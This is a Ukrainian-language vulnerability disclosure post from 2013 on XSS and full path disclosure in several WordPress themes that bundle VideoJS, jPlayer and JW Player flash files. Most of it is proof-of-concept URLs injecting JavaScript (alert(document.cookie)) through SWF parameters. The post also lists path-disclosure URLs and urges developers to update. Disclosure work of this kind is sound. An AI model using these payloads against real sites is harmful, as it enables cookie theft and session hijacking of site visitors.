Уразливості в численних темах для WordPress з VideoJS
23:55 15.05.2013У лютому, 07.02.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.
Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 171000 сайтів з цією флешкою.
Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Covert VideoPress, Photolio, Source, Smartstart та Crius. Та існують інші уразливі теми для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.
Cross-Site Scripting (WASC-08):
Існують теми з багатьма флеш медіа плеєрами: окрім VideoJS вони мають jPlayer і JW Player. І такі теми мають усі XSS та Content Spoofing уразливості, які мають jPlayer і JW Player.
Covert VideoPress:
http://site/wp-content/themes/covertvideopress/assets/video-js.swf?readyFunction=alert(document.cookie)
Photolio:
http://site/wp-content/themes/photolio/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/photolio/js/jwplayer/video-js.swf?readyFunction=alert(document.cookie)
Source:
http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/video/video-js.swf?readyFunction=alert(document.cookie)
Smartstart:
http://site/wp-content/themes/smartstart/js/video-js.swf?readyFunction=alert(document.cookie)
Crius:
http://site/wp-content/themes/crius/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/crius/js/video-js.swf?readyFunction=alert(document.cookie)
Full path disclosure (WASC-13):
Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.
http://site/wp-content/themes/covertvideopress/
http://site/wp-content/themes/photolio/
http://site/wp-content/themes/source/
http://site/wp-content/themes/smartstart/
http://site/wp-content/themes/crius/
Вразливі всі версії наступних веб додатків: Covert VideoPress, Photolio, Source, Smartstart та Crius.
Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.